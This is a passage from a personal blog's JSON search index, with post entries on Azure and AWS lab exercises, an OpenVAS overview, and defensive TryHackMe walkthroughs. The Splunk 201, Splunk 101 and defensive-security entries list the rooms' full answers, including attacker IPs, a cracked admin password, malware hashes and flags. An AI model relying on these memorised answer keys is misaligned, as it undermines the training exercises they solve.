opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#create-virtual-networks-vnets-in-azure\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003ciframe width=\"560\" height=\"315\" src=\"https://www.youtube.com/embed/DwMOPpE_r9Y?si=vj-apRWtEM3fC9v8\" title=\"YouTube video player\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen\u003e\u003c/iframe\u003e\n\u003cp\u003e\u003ca href=\"https://microsoftlearning.github.io/AZ-700-Designing-and-Implementing-Microsoft-Azure-Networking-Solutions/Instructions/Exercises/M01-Unit%204%20Design%20and%20implement%20a%20Virtual%20Network%20in%20Azure.html\"\u003e Lab Guide from Microsoft Learning \u003c/a\u003e\u003c/p\u003e","title":"Create Virtual Networks In Azure"},{"content":"IAM: Configure Azure Policy # ","date":"August 1, 2023","permalink":"https://notesbynisha.com/posts/2023-08-01-identity-and-access-management-azure-policy/","section":"Writing","summary":"\u003ch2 id=\"iam--configure-azure-policy\" class=\"relative group\"\u003eIAM:  Configure Azure Policy \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#iam--configure-azure-policy\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cimg src=\"/assets/images/IAM AZ Policy 1.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 2.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 3.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 4.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 5.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 6.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 7.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 8.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 9.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 10.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 11.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 12.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 13.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 14.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 15.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 16.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 17.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 18.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 19.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 20.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 21.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 22.png\"\u003e\n\u003cimg src=\"/assets/images/IAM AZ Policy 23.png\"\u003e","title":"Identity And Access Management Azure Policy"},{"content":"IAM: Create Resource Manager Locks in Azure #","date":"August 1, 2023","permalink":"https://notesbynisha.com/posts/2023-08-01-identity-and-access-management-resource-manager-locks-in-azure/","section":"Writing","summary":"\u003ch2 id=\"iam--create-resource-manager-locks-in-azure\" class=\"relative group\"\u003eIAM:  Create Resource Manager Locks in Azure \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#iam--create-resource-manager-locks-in-azure\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e","title":"Identity And Access Management Resource Manager Locks In Azure"},{"content":"IAM: Configure Role-Based Access Control (RBAC) in Azure # ","date":"August 1, 2023","permalink":"https://notesbynisha.com/posts/2023-08-01-identity-and-access-management-role-based-access-control/","section":"Writing","summary":"\u003ch2 id=\"iam--configure-role-based-access-control-rbac-in-azure\" class=\"relative group\"\u003eIAM:  Configure Role-Based Access Control (RBAC) in Azure \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#iam--configure-role-based-access-control-rbac-in-azure\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cimg src=\"/assets/images/iam role based access control 1.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 2.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 3.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 4.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 5.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 6.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 7.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 8.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 9.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 10.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 11.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 12.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 13.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 14.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 15.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 16.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 17.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 18.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 19.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 20.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 21.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 22.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 23.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 24.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 25.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 26.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 27.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 28.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 29.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 30.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 31.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 32.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 33.png\"\u003e\n\u003cimg src=\"/assets/images/iam role based access control 34.png\"\u003e","title":"Identity And Access Management Role Based Access Control"},{"content":"Learn to use Splunk for incident handling through interactive scenarios. # Room: https://tryhackme.com/r/room/splunk201 Learning Objectives and Pre-requisites Before going through this room, it is expected that the participants will have a basic understanding of Splunk. If not, consider going through this room, Splunk 101 (https://tryhackme.com/jr/splunk101). Learn how to leverage OSINT sites during an investigation How to map Attacker's activities to Cyber Kill Chain Phases How to utilize effective Splunk searches to investigate logs Understand the importance of host-centric and network-centric log sources Task 1 Introduction: Incident Handling Q: Read the above and continue to the next task. Answer: No answer needed Task 2 Incident Handling - Life Cycle Q: Ccontinue to the Next task. Answer: No answer needed Task 3 Incident Handling: Scenario Q: Continue with the lab Answer: No answer needed Task 4 Reconnaissance Phase Q1: One suricata alert highlighted the CVE value associated with the attack attempt. What is the CVE value? Answer: CVE-2014-6271 Q2: What is the CMS our web server is using? Answer: joomla Q3: What is the web scanner, the attacker used to perform the scanning attempts? Answer: acunetix Q4: What is the IP address of the server imreallynotbatman.com? Answer: 192.168.250.70 Task 5 Exploitation Phase Q1: What was the URI which got multiple brute force attempts? Answer: /joomla/administrator/index.php Q2: Against which username was the brute force attempt made? Answer: admin Q3: What was the correct password for admin access to the content management system running imreallynotbatman.com?\nAnswer: batman Q4: What IP address is likely attempting a brute force password attack against imreallynotbatman.com Answer: 23.22.63.114 Q5: After finding the correct password, which IP did the attacker use to log in to the admin panel? Answer: 40.80.148.42 Task 6 Installation Phase Q1: Sysmon also collects the Hash value of the processes being created. What is the MD5 HASH of the program 3791.exe? Answer: AAE3F5A29935E6ABCC2C2754D12A9AF0 Q2: Looking at the logs, which user executed the program 3791.exe on the server?\nAnswer: NT AUTHORITY\\IUSR Q3: Search hash on the virustotal. What other name is associated with this file 3791.exe? Answer: ab.exe Task 7 Action on Objectives Q1: What is the name of the file that defaced the imreallynotbatman.com website ? Answer: poisonivy-is-coming-for-you-batman.jpeg\nQ2: Fortigate Firewall \u0026lsquo;fortigate_utm\u0026rsquo; detected SQL attempt from the attacker\u0026rsquo;s IP 40.80.148.42. What is the name of the rule that was triggered during the SQL Injection attempt?\nAnswer: HTTP.URI.SQL.Injection Task 8 Command and Control Phase Q1: This attack used dynamic DNS to resolve to the malicious IP. What fully qualified domain name (FQDN) is associated with this attack?\nAnswer: prankglassinebracket.jumpingcrab.com Task 9 Weaponization Phase Q1: What IP address has P01s0n1vy tied to domains that are pre-staged to attack Wayne Enterprises?\nAnswer: 23.22.63.114\nQ2: Based on the data gathered from this attack and common open-source intelligence sources for domain names, what is the email address that is most likely associated with the P01s0n1vy APT group? Answer: lillian.rose@po1s0n1vy.com Task 10 Delivery Phase Q1: What is the HASH of the Malware associated with the APT group? Answer: c99131e0169171935c5ac32615ed6261 Q2: What is the name of the Malware associated with the Poison Ivy Infrastructure? Answer: MirandaTateScreensaver.scr.exe Task 11 Conclusion Q4: Read the above. Answer: No answer needed ","date":"July 22, 2023","permalink":"https://notesbynisha.com/posts/2023-07-22-incident-handling-with-splunk-thm-walkthrough/","section":"Writing","summary":"\u003ch3 id=\"learn-to-use-splunk-for-incident-handling-through-interactive-scenarios\" class=\"relative group\"\u003eLearn to use Splunk for incident handling through interactive scenarios. \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#learn-to-use-splunk-for-incident-handling-through-interactive-scenarios\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h3\u003e\u003cimg src=\"/assets/images/thm_splunk_incident_handling.PNG\"\u003e\nRoom:\u003ca href=\"https://tryhackme.com/r/room/splunk201\"\u003e https://tryhackme.com/r/room/splunk201\u003c/a\u003e\n\u003ch4\u003eLearning Objectives and Pre-requisites\u003c/h4\u003e\nBefore going through this room, it is expected that the participants will have a basic understanding of Splunk. If not, consider going through this room, Splunk 101 (https://tryhackme.com/jr/splunk101).\n\u003cul\u003e\n\t\u003cli\u003eLearn how to leverage OSINT sites during an investigation\u003c/li\u003e\n\t\u003cli\u003eHow to map Attacker's activities to Cyber Kill Chain Phases\u003c/li\u003e\n\t\u003cli\u003eHow to utilize effective Splunk searches to investigate logs\u003c/li\u003e\n  \u003cli\u003eUnderstand the importance of host-centric and network-centric log sources\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch5\u003eTask 1 Introduction: Incident Handling \u003c/h5\u003e\n\u003cp\u003e\u003cstrong\u003e Q: Read the above and continue to the next task. \u003c/strong\u003e \u003cbr\u003e\n\u003cem\u003e Answer: No answer needed \u003c/em\u003e\u003c/p\u003e","title":"Incident Handling With Splunk / Splunk 201 (TryHackMe Walkthrough)"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/log-management/","section":"Tags","summary":"","title":"Log Management"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/siem/","section":"Tags","summary":"","title":"SIEM"},{"content":" Room Link: https://tryhackme.com/room/splunk101\nLearning Objectives and Pre-requisites If you are new to SIEM, please complete the Introduction to SIEM. This room covers the following learning objectives: Splunk overview Splunk components and how they work Different ways to ingest logs Normalization of logs Task 1 Introduction Splunk is one of the leading SIEM solutions in the market that provides the ability to collect, analyze and correlate the network and machine logs in real-time. In this room, we will explore the basics of Splunk and its functionalities and how it provides better visibility of network activities and help in speeding up the detection.\nContinue with the next task.\nTask 2 Connect with the Lab Room Machine Before moving forward, deploy the machine. When you deploy the machine, it will be assigned an IP. Access this room in a web browser on the AttackBox, or via the VPN at http://MACHINE_IP. The machine will take up to 3-5 minutes to start.\nContinue with the next task. Task 3 Splunk Components Q1 - Which component is used to collect and send data over the Splunk instance?\nAnswer: Forwarder\nSplunk Forwarder\nSplunk Forwarder is a lightweight agent installed on the endpoint intended to be monitored, and its main task is to collect the data and send it to the Splunk instance. It does not affect the endpoint\u0026rsquo;s performance as it takes very few resources to process. Some of the key data sources are:\nWeb server generating web traffic. Windows machine generating Windows Event Logs, PowerShell, and Sysmon data. Linux host generating host-centric logs. Database generating DB connection requests, responses, and errors. Task 4 Navigating Splunk Q1 - In the Add Data tab, which option is used to collect data from files and ports?\nAnswer: Monitor\nTask 5 Adding Data Q1 - Upload the data attached to this task and create an index \u0026ldquo;VPN_Logs\u0026rdquo;. How many events are present in the log file?\nAnswer: 2862\nQ2 - How many log events by the user Maleena are captured?\nAnswer: 60 Q3 - What is the name associated with IP 107.14.182.38?\nAnswer: Smith Q4 - What is the number of events that originated from all countries except France? Remove the IP address from the query search bar that was added in the previous question. Scroll down the interesting fields panel on the left and click on source_country.\nAnswer: 2814 Q5 - How many VPN Events were observed by the IP 107.3.206.58?\nAnswer: 14 Task 6 Conclusion In this room, we explored Splunk, its components, and how it works. Please check the following Splunk walkthrough and challenge rooms to understand how Splunk is effectively used in investigating the incidents.\nIncident Handling with Splunk Investigating With Splunk Benign - Challenge PoshEclipse - Challenge ","date":"July 15, 2023","permalink":"https://notesbynisha.com/posts/2023-07-15-splunk-basics-thm-walkthrough/","section":"Writing","summary":"\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e  \u003ca href=\"https://tryhackme.com/room/splunk101\" target=\"_blank\" rel=\"noopener noreferrer\"\u003e \u003ca href=\"https://tryhackme.com/room/splunk101\" target=\"_blank\" rel=\"noreferrer\"\u003ehttps://tryhackme.com/room/splunk101\u003c/a\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n       \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/zyaof9kP54I?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n     \u003c/div\u003e\n\n\u003ch4\u003eLearning Objectives and Pre-requisites\u003c/h4\u003e\nIf you are new to SIEM, please complete the Introduction to SIEM. This room covers the following learning objectives:\n\u003cul\u003e\n\t\u003cli\u003eSplunk overview\u003c/li\u003e\n\t\u003cli\u003eSplunk components and how they work\u003c/li\u003e\n\t\u003cli\u003eDifferent ways to ingest logs\u003c/li\u003e\n    \u003cli\u003eNormalization of logs\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch5\u003eTask 1 Introduction \u003c/h5\u003e\nSplunk is one of the leading SIEM solutions in the market that provides the ability to collect, analyze and correlate the network and machine logs in real-time. In this room, we will explore the basics of Splunk and its functionalities and how it provides better visibility of network activities and help in speeding up the detection.\u003cbr\u003e\n\u003cp\u003eContinue with the next task.\u003c/p\u003e","title":"Splunk Basics / Splunk 101 (TryHackMe Walkthrough)"},{"content":"Vulnerability Scanning with OpenVAS: Unveiling Cybersecurity Insights # In the ever-evolving landscape of cybersecurity, staying one step ahead of potential threats is paramount. This is where tools like OpenVAS (Open Vulnerability Assessment System) come into play, offering a powerful solution for identifying and mitigating vulnerabilities within your network. In this article, we will explore the world of OpenVAS, its purpose, and the critical differences between unauthenticated and credentialed scans. Join us on a journey through the realm of vulnerability management.\nWhat is OpenVAS? OpenVAS, an open-source vulnerability scanner, is a robust tool designed to detect and assess security vulnerabilities within a network. It's a vital component of any organization's cybersecurity arsenal. With its comprehensive database of known vulnerabilities and a range of scanning techniques, OpenVAS empowers security professionals to proactively identify weaknesses before malicious actors can exploit them. The Purpose of OpenVAS At its core, OpenVAS serves several essential purposes: 1. Vulnerability Identification OpenVAS scans your network, searching for known vulnerabilities in software, configurations, and systems. By pinpointing these weak spots, you can take proactive measures to address them before they are exploited by cybercriminals. 2. Risk Mitigation Once vulnerabilities are identified, OpenVAS provides actionable insights to help prioritize and mitigate risks. This allows organizations to allocate resources efficiently and focus on addressing the most critical security issues first. 3. Compliance Many industries and regulatory bodies require organizations to conduct regular vulnerability assessments as part of compliance efforts. OpenVAS helps meet these requirements by providing detailed reports on vulnerabilities and their remediation status. Unauthenticated vs. Credentialed Scans: Unmasking the Difference One crucial aspect of vulnerability scanning with OpenVAS is understanding the distinction between unauthenticated and credentialed scans. Let's delve into this difference: Unauthenticated Scans Unauthenticated scans, also known as remote scans, are conducted without providing any login credentials to the target systems. These scans are akin to an external perspective and can identify vulnerabilities that are visible to an attacker with no special access. Credentialed Scans Credentialed scans, on the other hand, involve providing login credentials (such as usernames and passwords) to the target systems. This approach grants OpenVAS deeper access, allowing it to inspect the system from an internal perspective. Credentialed scans can uncover vulnerabilities that are not visible externally, such as misconfigurations or weak security settings. Credentialed vs. Un-Authenticated Scan results using OpenVAS Leveraging OpenVAS in Vulnerability Management Vulnerability management is an essential aspect of cybersecurity, and OpenVAS plays a pivotal role in this process. Here's how: 1. Detection OpenVAS helps organizations detect vulnerabilities by scanning their network and systems regularly. This proactive approach allows for early detection and mitigation, reducing the window of opportunity for potential attackers. 2. Prioritization Not all vulnerabilities are created equal. OpenVAS assists in prioritizing remediation efforts by categorizing vulnerabilities based on their severity and potential impact. This ensures that resources are allocated to address the most critical issues first. 3. Remediation Once vulnerabilities are identified, OpenVAS provides guidance on how to remediate them effectively. After implementing remediation measures, subsequent scans can verify the success of these actions. 4. Compliance Reporting For organizations subject to regulatory requirements, OpenVAS generates compliance reports that demonstrate adherence to security standards and provide evidence of vulnerability assessment efforts. In a world where cyber threats are constantly evolving, OpenVAS stands as a formidable ally in the battle to secure your digital assets. By understanding its purpose, the difference between unauthenticated and credentialed scans, and its role in vulnerability management, you can harness the power of OpenVAS to safeguard your organization\u0026rsquo;s cybersecurity posture.\nWith OpenVAS as part of your arsenal, you\u0026rsquo;re not just reacting to threats; you\u0026rsquo;re proactively securing your network, one vulnerability at a time.\nSo, are you ready to take the next step in bolstering your cybersecurity defenses with OpenVAS? Dive in and discover the vulnerabilities lurking within your network, and let OpenVAS be your guide to a safer digital future.\nFor a detailed step-by-step guide on setting up and using OpenVAS, check out my project walkthrough on GitHub: Azure Vulnerability Management ","date":"July 13, 2023","permalink":"https://notesbynisha.com/posts/2023-07-13-vulnerability-scanning-with-openvas-unveiling-cybersecurity-insights/","section":"Writing","summary":"\u003ch2 id=\"vulnerability-scanning-with-openvas-unveiling-cybersecurity-insights\" class=\"relative group\"\u003eVulnerability Scanning with OpenVAS: Unveiling Cybersecurity Insights \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#vulnerability-scanning-with-openvas-unveiling-cybersecurity-insights\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cimg src=\"/assets/images/Azure OpenVAS Vulnerability Lab Diagram.jpg\"\u003e\n\u003cp\u003eIn the ever-evolving landscape of cybersecurity, staying one step ahead of potential threats is paramount. This is where tools like OpenVAS (Open Vulnerability Assessment System) come into play, offering a powerful solution for identifying and mitigating vulnerabilities within your network. In this article, we will explore the world of OpenVAS, its purpose, and the critical differences between unauthenticated and credentialed scans. Join us on a journey through the realm of vulnerability management.\u003c/p\u003e","title":"Vulnerability Scanning With Openvas Unveiling Cybersecurity Insights"},{"content":" Room Link: https://tryhackme.com/r/room/defensivesecurity\nTask 1 - Introduction to Defensive Security # Learning Objectives: Offensive security primarily aims at breaking into systems through various methods like exploiting bugs, abusing insecure setups, and bypassing access control policies. This is the realm of red teams and penetration testers.\nOn the other hand, defensive security focuses on two key tasks:\nPreventing intrusions from occurring. Detecting intrusions when they happen and responding appropriately. Blue teams are central to the defensive security field, and their responsibilities include:\n\u0026lt;li\u0026gt;User Cyber Security Awareness: Training users to protect against attacks targeting their systems.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;Documenting and Managing Assets: Keeping track of systems and devices to manage and protect them effectively.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;Updating and Patching Systems: Ensuring all systems are updated and patched to defend against known vulnerabilities.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;Setting Up Preventative Security Devices: Implementing firewalls and intrusion prevention systems (IPS) to control and block network traffic based on rules and attack signatures.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;Setting Up Logging and Monitoring Devices: Monitoring the network to detect malicious activities and intrusions, such as unauthorized devices appearing on the network.\u0026lt;/li\u0026gt; \u0026lt;br\u0026gt; This room covers various critical topics in defensive security, including:\nSecurity Operations Center (SOC) Threat Intelligence Digital Forensics and Incident Response (DFIR) Malware Analysis By completing this room, you will gain a comprehensive understanding of these essential aspects of defensive security.\nQuestion: Which team focuses on defensive security? Answer: Blue Team Task 2 - Areas of Defensive Security # Areas of Defensive Security: An Overview In the \"Intro to Defensive Security\" room, two primary topics are covered: Security Operations Center (SOC) and Threat Intelligence Digital Forensics and Incident Response (DFIR), including Malware Analysis Security Operations Center (SOC) A Security Operations Center (SOC) is a team of cybersecurity experts who monitor network systems to detect and respond to malicious activities. Key areas of focus for a SOC include:\nVulnerabilities: Identifying and patching system weaknesses to prevent exploitation. Policy Violations: Ensuring compliance with security policies, such as preventing the unauthorized uploading of sensitive data. Unauthorized Activity: Detecting and blocking unauthorized access, such as stolen login credentials. Network Intrusions: Identifying and mitigating intrusions, whether through malicious links or exploited servers. SOC responsibilities also include threat intelligence, which involves gathering information on potential threats to prepare and defend against adversaries.\nThreat Intelligence\nThreat intelligence involves collecting and analyzing data on actual and potential threats to inform a company\u0026rsquo;s defense strategies. This process includes:\nData Collection: Gathering information from network logs and public sources. Data Processing and Analysis: Organizing data for analysis to understand attackers' motives and tactics. Actionable Insights: Developing recommendations to mitigate threats and enhance security. Understanding adversaries' tactics helps predict and counteract their actions effectively. Digital Forensics and Incident Response (DFIR)\nDFIR encompasses the following areas:\n1. Digital Forensics: Investigating and analyzing digital evidence to understand attacks and identify perpetrators. Key areas include:\nFile System Analysis: Examining storage for programs, files, and deleted content. System Memory Analysis: Investigating system memory for malicious programs. System Logs: Reviewing logs for activity and traces of attacks. Network Logs: Analyzing network traffic to detect ongoing or past attacks. 2. Incident Response: Managing and responding to cyber incidents to minimize damage and recover quickly. The incident response process includes:\nPreparation: Training teams and implementing preventive measures. Detection and Analysis: Identifying and assessing incidents. Containment, Eradication, and Recovery: Stopping the spread, eliminating threats, and restoring systems. Post-Incident Activity: Reporting and learning from incidents to prevent future occurrences. Malware Analysis\nMalware analysis involves studying malicious software to understand its behavior and impact. Types of malware include:\nVirus: Code that spreads by altering files. Trojan Horse: Malicious software disguised as a legitimate program. Ransomware: Software that encrypts files and demands a ransom for decryption. Analysis methods include:\n\u0026lt;li\u0026gt;Static Analysis: Inspecting malware without executing it, often requiring knowledge of assembly language.\u0026lt;/li\u0026gt; \u0026lt;li\u0026gt;Dynamic Analysis: Running malware in a controlled environment to observe its behavior.\u0026lt;/li\u0026gt; By understanding malware, security professionals can develop strategies to detect, prevent, and respond to such threats effectively.\nQuestion: What would you call a team of cyber security professionals that monitors a network and its systems for malicious events?\nAnswer: Security Operations Center Question:What does DFIR stand for?\nAnswer: Digital Forensics and Incident Response\nQuestion:Which kind of malware requires the user to pay money to regain access to their files?\nAnswer: ransomware Task 3 - Practical Example of Defensive Security # By understanding malware, security professionals can develop strategies to detect, prevent, and respond to such threats effectively.\nBy understanding malware, security professionals can develop strategies to detect, prevent, and respond to such threats effectively.\nIn this exercise, we will interact with a SIEM to monitor the different events on our network and systems in real-time. Some of the events are typical and harmless; others might require further intervention from us. Find the event flagged in red, take note of it, and click on it for further inspection. Next, we want to learn more about the suspicious activity or event. The suspicious event might have been triggered by an event, such as a local user, a local computer, or a remote IP address. To send and receive postal mail, you need a physical address; similarly, you need an IP address to send and receive data over the Internet. An IP address is a logical address that allows you to communicate over the Internet. We inspect the cause of the trigger to confirm whether the event is indeed malicious. If it is malicious, we need to take due action, such as reporting to someone else in the SOC and blocking the IP address.\nQuestion: What is the flag that you obtained by following along?\nAnswer: THM{THREAT-BLOCKED} ","date":"May 3, 2023","permalink":"https://notesbynisha.com/posts/2023-05-03-intro-to-defensive-security/","section":"Writing","summary":"\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e \u003ca href=\"https://tryhackme.com/r/room/defensivesecurity\"\u003e\u003ca href=\"https://tryhackme.com/r/room/defensivesecurity\" target=\"_blank\" rel=\"noreferrer\"\u003ehttps://tryhackme.com/r/room/defensivesecurity\u003c/a\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2 id=\"task-1---introduction-to-defensive-security\" class=\"relative group\"\u003eTask 1 - Introduction to Defensive Security \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#task-1---introduction-to-defensive-security\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e\u003cp\u003e\u003cstrong\u003e Learning Objectives: \u003c/strong\u003e\nOffensive security primarily aims at breaking into systems through various methods like exploiting bugs, abusing insecure setups, and bypassing access control policies. This is the realm of red teams and penetration testers.\u003c/p\u003e","title":"Introduction to Defensive Security - THM Walkthrough by Nisha"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/kali/","section":"Tags","summary":"","title":"Kali"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/rdp/","section":"Tags","summary":"","title":"RDP"},{"content":"","date":null,"permalink":"https://notesbynisha.com/tags/tools/","section":"Tags","summary":"","title":"Tools"},{"content":" Room Link: Windows Fundamentals 1 - TryHackMe Walkthrough #","date":"May 1, 2023","permalink":"https://notesbynisha.com/posts/2023-05-01-windows-fundamemtals-1-thm/","section":"Writing","summary":"\u003cp\u003e\u003cstrong\u003e Room Link: \u003c/strong\u003e\u003c/p\u003e\n\u003ch2 id=\"windows-fundamentals-1---tryhackme-walkthrough\" class=\"relative group\"\u003eWindows Fundamentals 1 - TryHackMe Walkthrough \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#windows-fundamentals-1---tryhackme-walkthrough\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e","title":"Windows Fundamentals 1 - TryHackMe Walkthrough"},{"content":"Configure Network Monitoring in AWS #","date":"April 17, 2023","permalink":"https://notesbynisha.com/posts/2023-04-17-configure-network-monitoring-in-aws/","section":"Writing","summary":"\u003ch2 id=\"configure-network-monitoring-in-aws\" class=\"relative group\"\u003eConfigure Network Monitoring in AWS \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#configure-network-monitoring-in-aws\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e","title":"Configure Network Monitoring In Aws"},{"content":"Implement Security Controls in AWS #","date":"April 17, 2023","permalink":"https://notesbynisha.com/posts/2023-04-17-implement-security-controls-in-aws/","section":"Writing","summary":"\u003ch2 id=\"implement-security-controls-in-aws\" class=\"relative group\"\u003eImplement Security Controls in AWS \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" href=\"#implement-security-controls-in-aws\" aria-label=\"Anchor\"\u003e#\u003c/a\u003e\u003c/span\u003e\u003c/h2\u003e","title":"Implement Security Controls In Aws"},{"content":"Enable Inter-VPC Connectivity with AWS Transit Gateway # ","date":"April 16, 2023","permalink":"https://notesbynisha.com/posts/2023-04-16-enable-inter-vpc-connectivity-with-aws-transit-gateway/","section":"Writing","summary":"\u003ch2 id=\"enable-inter-vpc-connectivity-with-aws-transit-gateway\" class=\"relative group\"\u003eEnable Inter-VPC Connectivity with AWS Transit Gateway \u003cspan class=\"absolute top-0 w-6 transition-opacity opacity-0 -start-6 not-prose group-hover:opacity-100\"\u003e\u003ca class=\"group-hover:text-primary-300 dark:group-hover:text-neutral-700\" style=\"text-decoration-line: none !important;\" 